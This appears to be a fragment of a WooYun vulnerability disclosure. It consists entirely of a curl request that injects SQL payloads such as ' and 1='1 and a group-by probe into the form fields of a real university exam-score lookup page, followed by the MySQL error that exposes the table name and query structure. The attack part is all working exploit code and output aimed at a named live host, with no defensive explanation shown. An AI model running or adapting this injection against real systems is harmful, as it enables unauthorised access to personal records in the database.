WooYun.org

curl 'http://ahtkb.hfut.edu.cn/ahtkb/search_crcj.php' -H 'Origin: http://ahtkb.hfut.edu.cn' -H 'Accept-Encoding: gzip,deflate,sdch' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://ahtkb.hfut.edu.cn/ahtkb/do.php?ac=query&step=1' -H 'Connection: keep-alive' --data "year=2014&zjlx=1&hm=' and 1='1&birth=' group by cm having 1=1 --'&submit=%BF%AA%CA%BC%B2%E9%D1%AF" --compressed > temp.html

</td></tr></table><b>Database error:</b> Invalid SQL: SELECT * FROM cj_34_2014_cm WHERE zjhm = '' and 1='1' AND csrq = '' group by cm having 1=1 --'' LIMIT 1<br>
<b>MySQL Error</b>: 1054 (Unknown column 'cm' in 'group statement')<br>